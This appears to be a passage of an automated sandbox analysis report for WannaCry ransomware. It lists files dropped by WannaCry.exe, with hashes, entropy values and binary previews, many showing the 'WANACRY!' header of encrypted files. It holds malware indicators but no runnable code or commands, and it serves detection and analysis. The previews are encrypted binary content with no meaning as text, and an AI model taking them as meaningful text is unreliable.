                                                                              Preview:WANACRY!....Jo.w..s.D6?$.3.........O,.S.:...U..X..yg..C..1kW...*[.......!h:.................1U.`..a..SUa.$.P1.%.8.....?....M...IY..K.~...NA.M.Q...S......!..E...Q..@..A...K...^k.o?..L.{T...LfzDH81.[!.`.8....@....Sc.,r+.8.....1.4..&.A.....">."e.w ..60.1..............L.u..1.4..N.I.Z..)uW.-b'.~....h.c./Gki.9...5.@.{.5f....t.......l.~.Uo..$...t....0Z.?..B.G./n.Y.d6...L.>]...e$...T9.X./>R..t]...7<........{.in....:mf...i..........h.f#..m....1....}g.f.....iI.%'.(.@j..^...i_d.`q..V...:.r.....v.).~$..O.....z.a0.....?..4.|.....C..y......._.Hb.@R.N.....b..4...W..r...As\..3.wP...h.Z......@....4.,....<.ss..@P.. x>...l....{M.{"....Tt].......E.@.`..........^9...@.$..u{..H..S.....|k......[...S...E..n......Y.:.A;..'?...9.'....X.r.0........k.Z.....p.....mEm.qf'..@1v.K..^M..a...K.[.-b.-..vm.DV.+..8..a..<._G..FY...X..T.."..7...Fu..G.U3t.....@.^9r..8...\.>..V..Tm.%.^.T8.t....5.i.D.5'X....R.a6....U.5A..'...#....T.(....5.1..;....z...km........x.W..a[.aA......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.804978372141051
                                                                              Encrypted:false
                                                                              SSDEEP:24:xXZsbmefeQTx3VF/E3Z9Yio3bZtnYldwBRcVrr:lZsbsQhVF/EJyAlWD8f
                                                                              MD5:87A0DDBB4BDE031C8098BA31F7338C7F
                                                                              SHA1:4F251230448BEF677B894FF7B5975ABC96798F93
                                                                              SHA-256:C569E022B34E7252728E25F11934EC2997C5F7A93BDF15B3C63BD33294020688
                                                                              SHA-512:95C4ECAFBE1A0467203B26E63D1557450331CB79E95E2808A59EB91D54B83CCA977A34BBBBFAD136ACFAA78E575989D691839A54F73D0EC6426D742892F5357F
                                                                              Malicious:false
                                                                              Preview:.y.j6UH.%"L......Rab.i.)....X.r.9..-.~.n.W..q..1v?&.........;..y..7..q.l.j&&..c[.&j....o;..p%:.aY.A._'.|.ib,.Vf..H.y{....rP.........d._.....G....6l..k.W....qa|6y.6w.'..;Y.|.@..d.Z.._....zk..D.....-.;K.G..85[.L....(.k.l...$.h......R..Z...&....vJ....R...G.I...6.Y.2~.......w1........F-...tA..\U...>..&..V...X..}E........k...3....H.o....G..0..gK~*...... .`..h......uk ......N..J..m..4..B9..9S.....KV.O.v...;...[l.}.QfX.*B..X.r.8..A.....[&.5......]...P"|[z.A.............._........2s..1d\.^+.j..!.AQh5.....u.b{o.x../z....x...A`..D......VSW.VNi....M....Ka.D.O.zq2`..}.8.L..b.e....b.O.I.{.2.w...F...{..|&.G..|..h.*.]>.....Y.^..0.jDI...\..u...{=;..S..1......K..%..qF....E..gV.(./.?+.A.`.T`.....u....i'.1...Q..."..v?G.u)}.p.e..l.......R.........f.`....N)!A.I.n..\x.-..Ol...1..7.P...|Z.....G[K<\......Fm.3..?..D..h..v...B.wd...BO~.[.wO..S.;].C."....,..+2*.Ds..1U...._,.;dA...|.....a..67..Y..rw... .C....A'.......O.Caj.d.[W.B9.x.h.4,.U....].q....'V....5..=...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.832259674078862
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkigyVQrGb2Rc5eJpTScMQaS4fYqaoWtcnQ1ni1dyS5LQo0UudvAOGsEVA5u:bk4jIJNMXS7Lt1nizyS5EBDTE6k
                                                                              MD5:56EF93103EC9E0FF6775FBB21313E904
                                                                              SHA1:83DE21CA954D6C45C7336192F58CDB9AE0948256
                                                                              SHA-256:3533946916710492AA23565A7DE858072245A8740CEA5769BFBE0DF284E261F8
                                                                              SHA-512:83008135A55D82FF2D71F694D882398BCFC3E54889B12997F8A8859AF2AEAC8367EE6F8DEAB7E4A742CD2EE9CD4DE1D3BF4FE46D13EC8B369EC9AA6D4EA05A2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....j....\..G...;..H.......j.]EtP..c,...=.$%;K.J7.>.8...\p.@.{.&.0@\.O.g...g.Gq....O..A..O...........b._......$..?..}.c..t$..9.9.....0.../`..$U...>.2(J..>G:H.{.......zslf.G.#HIM8F....C..E.4a..e.....h.YJQ.......l.IH..x.h.M..Wm=.f..g.....Io]:..E");.G..............>.a.pi#.......=.Zib..Ou.M....F0.....H.....e1I.N3...v..>+..a.....-D.....I..c........2W..e..."0.....6b.m..x...Xk.W..4%nQ.......D..7.VZC.s.n.......o...r<.@n/..RR...Y..1x1.e......)[hw.....tB..".<....y.e.y_.....WWz !.$'q......B...dHs..z.1(..=J..A1s..F.U..`..2h.t..8j}..,.>....^R|;o..~.f..p,.i+R.<T.c.C..[=?.:R.n.s..G....\kk...2p...gS....<.r.:%..r....&...~.Y......-sM...|RdSW<.#..z.......1a..m..*j......C....DV..Q[...t+u.|.&....zE.)g<..c.7o.hIw5,%..]~..fw3..m..6...I...6i.'..}.<9..o?..........i.NEw.H.......2..K.R.....3U.......S.E$.l.X..P.Qm.U..wrw#....\"......R.s.H.*.}.N...m....>.Bk).H...u.ny...:.....h..3..O8G!..V....`&..Uq..,..2......u7.|.%...F).....2.......U..{...S...{.H....?.-%.B..[.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.832259674078862
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkigyVQrGb2Rc5eJpTScMQaS4fYqaoWtcnQ1ni1dyS5LQo0UudvAOGsEVA5u:bk4jIJNMXS7Lt1nizyS5EBDTE6k
                                                                              MD5:56EF93103EC9E0FF6775FBB21313E904
                                                                              SHA1:83DE21CA954D6C45C7336192F58CDB9AE0948256
                                                                              SHA-256:3533946916710492AA23565A7DE858072245A8740CEA5769BFBE0DF284E261F8
                                                                              SHA-512:83008135A55D82FF2D71F694D882398BCFC3E54889B12997F8A8859AF2AEAC8367EE6F8DEAB7E4A742CD2EE9CD4DE1D3BF4FE46D13EC8B369EC9AA6D4EA05A2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....j....\..G...;..H.......j.]EtP..c,...=.$%;K.J7.>.8...\p.@.{.&.0@\.O.g...g.Gq....O..A..O...........b._......$..?..}.c..t$..9.9.....0.../`..$U...>.2(J..>G:H.{.......zslf.G.#HIM8F....C..E.4a..e.....h.YJQ.......l.IH..x.h.M..Wm=.f..g.....Io]:..E");.G..............>.a.pi#.......=.Zib..Ou.M....F0.....H.....e1I.N3...v..>+..a.....-D.....I..c........2W..e..."0.....6b.m..x...Xk.W..4%nQ.......D..7.VZC.s.n.......o...r<.@n/..RR...Y..1x1.e......)[hw.....tB..".<....y.e.y_.....WWz !.$'q......B...dHs..z.1(..=J..A1s..F.U..`..2h.t..8j}..,.>....^R|;o..~.f..p,.i+R.<T.c.C..[=?.:R.n.s..G....\kk...2p...gS....<.r.:%..r....&...~.Y......-sM...|RdSW<.#..z.......1a..m..*j......C....DV..Q[...t+u.|.&....zE.)g<..c.7o.hIw5,%..]~..fw3..m..6...I...6i.'..}.<9..o?..........i.NEw.H.......2..K.R.....3U.......S.E$.l.X..P.Qm.U..wrw#....\"......R.s.H.*.}.N...m....>.Bk).H...u.ny...:.....h..3..O8G!..V....`&..Uq..,..2......u7.|.%...F).....2.......U..{...S...{.H....?.-%.B..[.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.775462219505603
                                                                              Encrypted:false
                                                                              SSDEEP:24:BgbPbhE2eDwoPhr5HVbuDxLK0DTSKci51BCLD83:OswGhr5HZ8Rbn1AE
                                                                              MD5:AAC67BAE778384F837E9705801D9236D
                                                                              SHA1:1C4441D0421F29B50FA796F31456DDBCE8E80257
                                                                              SHA-256:5E8584C02FFB56DBA57117CA4E4A67A46CF4ED46D80850888ED5108503615A19
                                                                              SHA-512:357C9F1F2F0C907C1B427425592F3E20AC38E71FD95BD4502E30C040D288C1F3E8944A8549275F7F0E877AE792945E8E4F237CD4A5735E128482FC6BB78992FF
                                                                              Malicious:false
                                                                              Preview:I......V:*.......H......%.b0t63......\S[..7.9:`.B..8Y.F:...p.8.".g}.]uU'e4..5.W.S.........0".k.o..q .C..pq.HW...m.~..yp..y|...d..g).3OW.A.P.........z4m.*X,....u..+.&../...Ub].#F.z.g.. .....[v......s]9.`....4l]. ..}2....LF.PeI..i9D....:.T....#..I.<r.S......%..a><.2...K....B....f...`.*.z.:.~.n|/..;.<`-..G.O.k..y|.U.'......vVV.....o..|...v.B.....07...o...M...8./9@..\...W.1] =.....8..e.. rI..U..|.g.jd.=./..A..........%.}9.Rb`A..5...-N=..........a.c/h....x;..........'.U=zaQA.........,QT.1{>...D.[z=......9.lr...;.g8]F.t/.=>..Fy..)!DR..=7..oH..eS..^.u..........J.Z+..6Yq...@..w.X...+V.2....EV-...T..Op..IX........t.......y.J..I0 ...T3....0...(.X`.|cV..b..."1.#.....|.Ka......)*...u3B.......Og1..*.b."3...?'.A.3.4l..+_{..e..`......i...R..&....O...2g..W.(..e.:.;Q.kg5..`.I.....{_.0.....U9....[....$.?....v.<..<T..1.H...8.b...W?Fa.';.e..[......;...Q..a.....Ov......d.x.1LAx...ko..d...b...`.....@....D....T..,6=2#B..O.p.._.SW.qo....?..8R.g.x0/*.@.&.x.J......@.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8532324603406
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktxmdkLsK2nLL1uf/p5s4cNbG+gf3wYQWQuvw7iLJ6iK/rPW/yXXuLen:bktoS2LEk4q8Yf7iLbKXpn
                                                                              MD5:8941AA9E5364B6B5801355107D2CCDF8
                                                                              SHA1:ADD6E843CE827E9379783C6C19D61D43DBBBD58F
                                                                              SHA-256:E97100E19F01D42B53BEFAAA716CA09C735832FBDC92792053CB524019896F57
                                                                              SHA-512:23B82CFA56E1EDAC85C3A14027778DD3394975C57EFBA5C8A23574EC5CA108D95040415FE3DB7A6100460129FE92BCFA21CF2CB5AC39CE33A705678676EBD3A6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:4...I.s.<5..h|.#eZR.|.[.....!..;.`.......{.m....=.l..-w.5.#.Xn"7|...?..o(...],....t.QQ.*."pIU4..zN.q.Z../....m......9.dZ...$E3..a..t..L..'....E......Q+..(f...s.m......J^.Zh.e/.8.....P..$.M....S../.$.:.......#....."..J..E..W>..m.h.E.dd'.%K....u.*#W............Lq.T..V#..0......;...]......].s[J..;..|{.J..=X..(e..Y.l...0.Qi}W...mXP@...G..L....S[......6..O.<...2.D........ ..<...jr_."}.S+...:C1.`.k.c?....BwK@....*=.fd..y.U..4Ykw...Q.}.;.....0}&.i.. .........u...+r.....I..B.....E.;-.pG.I.S.......~.........Z.........-W ........i.p.2eLUF.l.....|tMdR;...9.BA7..r.S"..n.8....]y.x{9.\gs...S.....Z.f.V..s..i....SA.....8D.....'(.e.r....Xr...gj..S....._...#..>.....].^.$%......>.....d...Xz=...9.b<#E9........W.D..e.....Dm...C.E.~v,.v..l..Pb..x..S..&V..J.>F .O...wJ...H......ta..;.I.8...9.7$...q...Sd=`...b..oQ....p.....z~......P.......EV:4I2.J..%.....aN..j..Q......9....{'Z#..X,........ ..$a..j..cJ+.|.G....1..S6........x.K...:>..h~.C..B...<......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8532324603406
                                                                              Encrypted:false
                                                                              SSDEEP:24:bktxmdkLsK2nLL1uf/p5s4cNbG+gf3wYQWQuvw7iLJ6iK/rPW/yXXuLen:bktoS2LEk4q8Yf7iLbKXpn
                                                                              MD5:8941AA9E5364B6B5801355107D2CCDF8
                                                                              SHA1:ADD6E843CE827E9379783C6C19D61D43DBBBD58F
                                                                              SHA-256:E97100E19F01D42B53BEFAAA716CA09C735832FBDC92792053CB524019896F57
                                                                              SHA-512:23B82CFA56E1EDAC85C3A14027778DD3394975C57EFBA5C8A23574EC5CA108D95040415FE3DB7A6100460129FE92BCFA21CF2CB5AC39CE33A705678676EBD3A6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....:4...I.s.<5..h|.#eZR.|.[.....!..;.`.......{.m....=.l..-w.5.#.Xn"7|...?..o(...],....t.QQ.*."pIU4..zN.q.Z../....m......9.dZ...$E3..a..t..L..'....E......Q+..(f...s.m......J^.Zh.e/.8.....P..$.M....S../.$.:.......#....."..J..E..W>..m.h.E.dd'.%K....u.*#W............Lq.T..V#..0......;...]......].s[J..;..|{.J..=X..(e..Y.l...0.Qi}W...mXP@...G..L....S[......6..O.<...2.D........ ..<...jr_."}.S+...:C1.`.k.c?....BwK@....*=.fd..y.U..4Ykw...Q.}.;.....0}&.i.. .........u...+r.....I..B.....E.;-.pG.I.S.......~.........Z.........-W ........i.p.2eLUF.l.....|tMdR;...9.BA7..r.S"..n.8....]y.x{9.\gs...S.....Z.f.V..s..i....SA.....8D.....'(.e.r....Xr...gj..S....._...#..>.....].^.$%......>.....d...Xz=...9.b<#E9........W.D..e.....Dm...C.E.~v,.v..l..Pb..x..S..&V..J.>F .O...wJ...H......ta..;.I.8...9.7$...q...Sd=`...b..oQ....p.....z~......P.......EV:4I2.J..%.....aN..j..Q......9....{'Z#..X,........ ..$a..j..cJ+.|.G....1..S6........x.K...:>..h~.C..B...<......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.807498766246624
                                                                              Encrypted:false
                                                                              SSDEEP:24:pjNbkl6avOoONzVtY6DMkILyUX+E1zyJjbopoD5KXNCs:RNbhLdVtY6wkILyiVkjboCD5y7
                                                                              MD5:FE93ED13DAFA5B3C1BE3188D616F0844
                                                                              SHA1:0461FD1588F655185A22C66DA313BA238EADAEBC
                                                                              SHA-256:63E737E15C5D124853758A6F76855651156397579E361BC3A128E88490AAEB76
                                                                              SHA-512:10C91AEF0BAB4664E181002B26235986550A5016994EEDC876BA960B199FB632497B094BA455BC692324E3F279057CC87BAEB8672C225AD84D641E9919974604
                                                                              Malicious:false
                                                                              Preview:...^.....Y5.>ft..$.noa..j_..T9>..?A1.+?@...%G.....I,.di....k.......p.v.........=.B...Es..".... ....?9F..E......a.,P.. ..L..w.:f.'..nH....v....o..:L.p.wH.%..a.f,......l...$.~..`b.Z.:...&(... .&.Xyy.M.:.C# .V..".b.r.......f.z.a.d.k...X...h9.....W...?..#t..].z..M..n]..%.x.R...?.....2L..........Q.S..F..."...v.|9....]*}:.:#..K..xV....S..e...m..>,~.{......."G:..R...t3.. m..p.k....O\.4;.A..I.nV!..y`..6...S\d...$,.PCb=...P4../R......a.....<[.0i...<......_..a,x.....J..n<HYX.l....X...[l.}U..KD.)t./^.X. ..D.wO.C.r{..Qv.>S.>.../...g.Lt..e.17......-Hi....A..F%V.K[.ynN...R...V..A._'......5EW;M....y..X.J.....oq..8..u..NH.1.v}..........$....,.o....(.Jn.X.hk;.L1G.1.=.S.G.1A...n.^...`>5.$#..O...?.p....3....]..O@...w/..W.......9.[.<..... ....+....rJ....]........).g=........R......d...f.D1.Sc..{.......s..E.K.}Y........0....om...Z..Y........N....Oke@..G(.L..o."......G.8..;`...I ..-.PS.k........I......6&Y\ZI...33..&.\..v%.+.W.. ...e.)k.*."..YN..N......@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858941061419491
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+sGvgSpi8lllN1omCFJdTjS7P85f2ZZiJf/qeE00gvgB8UkBf2pMata6B9T:bk+smgrY0FJxuD85f2ZeSeAB89BGttaK
                                                                              MD5:E37B38CA06AB544F5B3EF3B83478625A
                                                                              SHA1:63A22AD2EBD414AE8615653CDFD4BCA029EBDE65
                                                                              SHA-256:BF441C1546C661C398B0E7C57FD2B6FAD119B2F6DD7FD63C9E1E345186BDA397
                                                                              SHA-512:F6A8FF57E85FA0A76C410AD57B23EA58450946247E6567AA72AB8773DAA56C72EC5BCEBDC612EF48C7B825180445EE22E6EA5C2FF5942034FE3579C7BBCCDEE1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....7.0E.4...@....E..!...<.y..mP...Q...Q...z.e.k...:..*...0..>^.....~c$.P..{C.Pm.i..@....M3g.dH........l...._.:.....<...y./...f..R..U....]. .K.....0E..vue.eV.v......WK"GI..\....*.X..%^.*.X...L?a.C.....Z..M....i..`$....vJ.iE.../..D......a...,..XM...............@.:U..|..O...wl...!.N....k..ry_G..G._.-IV.'..........%...nV.......*.r.z..EM....^..~.?T..l..P.n.+Y,b..M.....]!.,.q...s.~..uN..'?q$.U..s..\..f...?..6.....D.Q.....|H.7..S .k........;..m..."$k..qcp.u..E.......uW.%.....4h......#....?.F..j..G...Dm.....f,b_...>KXv.5.m..Bx....w2 ....z.}.....{7..d.*.0.........../.U...6F...$B.K..g.....>.L'.}8R&f~.IlF5...2./{.m.Un..9...U.......y;{O..Qq...<.hU....^......<q.w...I....M..i.S.hsdh....n..S2[..nGa...u.@.......C~.....&/....I>.sy>%D.._.}.....u.vFy..Z.|.....}.;..[&..Kp.YJ......WV.#=..........E.M...-...S...b~...r.........p.1.h+F@.^+.....+.}...e`nK.._.z..c..YH...s.U..4..|..qa...0....=.X.w.m.8.L...:X..).wM....sS.V yk.'+K..L.#M..>......E...Ty.......B.*V.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858941061419491
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk+sGvgSpi8lllN1omCFJdTjS7P85f2ZZiJf/qeE00gvgB8UkBf2pMata6B9T:bk+smgrY0FJxuD85f2ZeSeAB89BGttaK
                                                                              MD5:E37B38CA06AB544F5B3EF3B83478625A
                                                                              SHA1:63A22AD2EBD414AE8615653CDFD4BCA029EBDE65
                                                                              SHA-256:BF441C1546C661C398B0E7C57FD2B6FAD119B2F6DD7FD63C9E1E345186BDA397
                                                                              SHA-512:F6A8FF57E85FA0A76C410AD57B23EA58450946247E6567AA72AB8773DAA56C72EC5BCEBDC612EF48C7B825180445EE22E6EA5C2FF5942034FE3579C7BBCCDEE1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....7.0E.4...@....E..!...<.y..mP...Q...Q...z.e.k...:..*...0..>^.....~c$.P..{C.Pm.i..@....M3g.dH........l...._.:.....<...y./...f..R..U....]. .K.....0E..vue.eV.v......WK"GI..\....*.X..%^.*.X...L?a.C.....Z..M....i..`$....vJ.iE.../..D......a...,..XM...............@.:U..|..O...wl...!.N....k..ry_G..G._.-IV.'..........%...nV.......*.r.z..EM....^..~.?T..l..P.n.+Y,b..M.....]!.,.q...s.~..uN..'?q$.U..s..\..f...?..6.....D.Q.....|H.7..S .k........;..m..."$k..qcp.u..E.......uW.%.....4h......#....?.F..j..G...Dm.....f,b_...>KXv.5.m..Bx....w2 ....z.}.....{7..d.*.0.........../.U...6F...$B.K..g.....>.L'.}8R&f~.IlF5...2./{.m.Un..9...U.......y;{O..Qq...<.hU....^......<q.w...I....M..i.S.hsdh....n..S2[..nGa...u.@.......C~.....&/....I>.sy>%D.._.}.....u.vFy..Z.|.....}.;..[&..Kp.YJ......WV.#=..........E.M...-...S...b~...r.........p.1.h+F@.^+.....+.}...e`nK.._.z..c..YH...s.U..4..|..qa...0....=.X.w.m.8.L...:X..).wM....sS.V yk.'+K..L.#M..>......E...Ty.......B.*V.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.797943766901883
                                                                              Encrypted:false
                                                                              SSDEEP:24:DmQo1MNaOT2ftKX/n49QU2/Gjwh3vxheqR1S/ZINCrbl:01Md2k4qAwhJhDSxIcrbl
                                                                              MD5:412215BC2459BE87EA7D352912B82860
                                                                              SHA1:A4C9C397BC5E2FBCF95ACEA49B1809D412AA97BD
                                                                              SHA-256:9CF37A863DE4A554C40F7EEBBE278D93FE75C7BBE4223144AD9A76A8E6D53CF9
                                                                              SHA-512:EF586AFABF1975CC8EDB80E9B4044058620EEC29FE2FBFE0C39749D5033698F9E98B2CD9CF3776B6F83E33D96912751D2A304B30FAB6AD3AFA6703B91F225569
                                                                              Malicious:false
                                                                              Preview:..^......5..n.."..`..C.e..X*}z.KR..@.{...5...MO...7.wi-.5....@......3.N.=..r...Bmf.}w..e~`c...<rxNa.....\...p..c..s...H...x.p.J...!..V.. ..+.....V/.p..D.......A(k........=....z..ZJ..L\?T ..\{Z..2.."t(......}.![........aq..l..A.Z..8=..H..qa."....?...I.h.&f..`O.-........f.l.3+...A.%."...w..\.+Y....=g...M.N.O.XJ......Z...v[.Q..V...nS...N!.[N\1..P..<C..\.."...J.....8.]+.....V.....).BI.....Fr.U.J..(...-4......HrW.l.Z....O.>.$.A?.."..>px.1...l.3....g.]5.....d.<...."&f...L...W.U_.+..K.....F8:..7F.[.....V.w....3..\...b.>J.r5v.[k|.&..........ek.bI<..q.%.O...lSg@.=...<.q..?.....{..-x[.....2.....egX.Eu....S. .Uw...l.g.d.X...6..(,.B.......;.}@.i.h...y..../.+.R..m.L...!..O:...*C....&.1......Q.M....]F..9.P.N._...._.C..$.C.4....].-.+f3H..^.4Oh.."\..D.......W.2...w}z..4.....DR.VL..z[..C.u..J..3.T7Sh..f.\..gG......w...L............;.7...Q..$.pE.....rc...%....../"..c4..u...$...E]..k...z.hR..|......B.d..G....#5.M.)..B9SR.........d`.....4r.....D.(..H...\d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846036608626006
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEIPv7yGdOtkji6Gjz9oTyT+qSoSvhmetZwWp6cdwV9Q5j:bkpPvWlQG/HT+qSoSvhxX8Zoj
                                                                              MD5:B5F74ACE185C3D3B3CE587B2FE805607
                                                                              SHA1:9986DCB9C4D5A7C4255F8DCCD5A311259BB693AD
                                                                              SHA-256:6EB0360E231F162E2130849EC30E4D2526010088503A1BD0D5E99F710BB567F4
                                                                              SHA-512:802DD3E79CD1CB63A07E794730A2901EF49EA775BEF81782C3F6857901EDCE4688822AE94814FE806ED6E95D88BAB817670F82749B537F150B87467D2BB9CBD7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......! w..qK............b..%.....jEV.I.4'..r..,>...+...x/Vw^z.:...SD.........O.D.j.u\..AG..>....t.M..r.m./.....H......._.{....@./.6P,."3.4...ZZI....y.....J!..)...1....;f5.Y.i.....cW...a..........C...d.9...+....?hV.Hx...P.....My.......Rn8....;................1.i.#rD....+.....j.g..k.4..=.K.....%..."UC.${K#......;5c..\... >!...... ...V.y..!s.v&..Q........g.1c.w8."..!1.q.>..?.....D....k..-....e.../..\.W.s.<....=z...5<.....Q.;..+.p....._..x^.._[."...?N..."4................H.q.!u...I..*]3..=.....O.Ga.N..;.i.g...Y.p...)q......B.@..IyK{HB.....R66M.........d.4.J_..uhU"Q...f......7.....$U|......S..i..?....i.N..].dT....2..{. @m.....a.... .c..N].B2....am.a...?=.....#........(.%H@k{.jZq.....$=....fX....Uu.}.G...._..N..D.....1.f.i..i....B..G....c....).s.I.C.aj...w......G...0.g...L.'.._....`#'.1..Nh..^d..Z.j.-.....L.o#(..D.....{y ..tT8]O5.2.!.u.M+.._9..UQ...f....J..`.r.8..t:5#.7...!T......f...zS...KYc...e.....l.y...._h!.F......?{W2...gY....>.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846036608626006
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEIPv7yGdOtkji6Gjz9oTyT+qSoSvhmetZwWp6cdwV9Q5j:bkpPvWlQG/HT+qSoSvhxX8Zoj
                                                                              MD5:B5F74ACE185C3D3B3CE587B2FE805607
                                                                              SHA1:9986DCB9C4D5A7C4255F8DCCD5A311259BB693AD
                                                                              SHA-256:6EB0360E231F162E2130849EC30E4D2526010088503A1BD0D5E99F710BB567F4
                                                                              SHA-512:802DD3E79CD1CB63A07E794730A2901EF49EA775BEF81782C3F6857901EDCE4688822AE94814FE806ED6E95D88BAB817670F82749B537F150B87467D2BB9CBD7
                                                                              Malicious:false
                                                                              Preview:WANACRY!......! w..qK............b..%.....jEV.I.4'..r..,>...+...x/Vw^z.:...SD.........O.D.j.u\..AG..>....t.M..r.m./.....H......._.{....@./.6P,."3.4...ZZI....y.....J!..)...1....;f5.Y.i.....cW...a..........C...d.9...+....?hV.Hx...P.....My.......Rn8....;................1.i.#rD....+.....j.g..k.4..=.K.....%..."UC.${K#......;5c..\... >!...... ...V.y..!s.v&..Q........g.1c.w8."..!1.q.>..?.....D....k..-....e.../..\.W.s.<....=z...5<.....Q.;..+.p....._..x^.._[."...?N..."4................H.q.!u...I..*]3..=.....O.Ga.N..;.i.g...Y.p...)q......B.@..IyK{HB.....R66M.........d.4.J_..uhU"Q...f......7.....$U|......S..i..?....i.N..].dT....2..{. @m.....a.... .c..N].B2....am.a...?=.....#........(.%H@k{.jZq.....$=....fX....Uu.}.G...._..N..D.....1.f.i..i....B..G....c....).s.I.C.aj...w......G...0.g...L.'.._....`#'.1..Nh..^d..Z.j.-.....L.o#(..D.....{y ..tT8]O5.2.!.u.M+.._9..UQ...f....J..`.r.8..t:5#.7...!T......f...zS...KYc...e.....l.y...._h!.F......?{W2...gY....>.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.831825926478697
                                                                              Encrypted:false
                                                                              SSDEEP:24:DLj5mFOZ3OAWjSO5bmFK+OZxXMElTT/U1+Vxy7n:DOOkjSODX7lf/UUK
                                                                              MD5:1EC1B414A30C5D3AE9BB4C344B55B388
                                                                              SHA1:CC57EAD15F1ED9DA952EED8404DBD2C6260E0315
                                                                              SHA-256:58957B1D1296065B0F541EB69192040AA907EB1B4810187A019E1EDD8A3572F6
                                                                              SHA-512:8B12B975F9DC21095A61454C674D7881ECF5E2937CBBC479F212D050B5438FD7C4E0139518FD8B48680034E7E09330456A23EDC93E5B8978DD150B7979BF9267
                                                                              Malicious:false
                                                                              Preview:.2....).U....E4....h%.]wm...8nS3.=...?.s.....E....F.@?.P..Q.J...<.....W.\.9.....+4.D.~.5..$<.l..NE.>,r|...W....v2*.....\.'.T%.:~-?F..i.X.....V.?..F...VTdp/d..>.............._...2.V..L..m.-2.....`..=..r.......A..3....w..Z.g$......|.D3\.?....P..x..$.o...K..6...*....w.g....x.#Y..Lbi..........&ao......}..._C.v..j.2.l..)...P5I%)....Gv....I.........j..k.3...X..K.....MCw+F.>..../.F....h.$*...o..0.....^<....Jn.F...a.w.cZ'%_..fj.'.....;.o]=.........9^..&...89.....2J..t.jl.A.A.M,..is^)$._....3..G[Z0.....o..$.Y/...n..P. Q(...|S=..m..X.;.+......7.;.....xj.2..Pd.I....(....!t..Sh.84..0....U.U~H..p6..f.'....9GPrM6...h.W'.i>......i......?..,....vY.Mm...37..0t.).\]../.m...U...._f..m)gZ..Fr9.m}S|..,..|Pe..Z.1X.....]...D. .n..yf(...c".V......n;d6zr...A8.1.G.lD.G^2..._.O....1.3.....*.e...........+&}.@..lX...u$29&.v7...i...>.jJ.NfHB..C&.......7.i....|.SR.'m..gk'..F..}.'.....J.8'p.G@q4).lZ..&"...].1..0.......a.....(q9h..oe..G.Q.......b/._...O2.........A.N
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.804241819329037
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkzpAz3qFBKCRBT4kAoD+MDq3eB4VTluRAEAxe+WPvg93L7DQs1j7Ivodg9Ng+pu:bkAKhAote3e4JluRAm+WQ93L4s1WNg+A
                                                                              MD5:90377289ACAD5779F5D70DF7A95F50BD
                                                                              SHA1:CD920971A45EA3A648A71EF744E192FBB320A50D
                                                                              SHA-256:0A6314854D652377881F922BE82049A9420EE2E1BE60C279C757173B63F1A91F
                                                                              SHA-512:C905F7C17A0638EB54439017765409CBF79EAE7129EC953DE70E3C473CC70F54DD032742B2D48B1BF4F72A48F3204B76B9AEF73F2371FFB7D965FB11DC0B877E
                                                                              Malicious:false
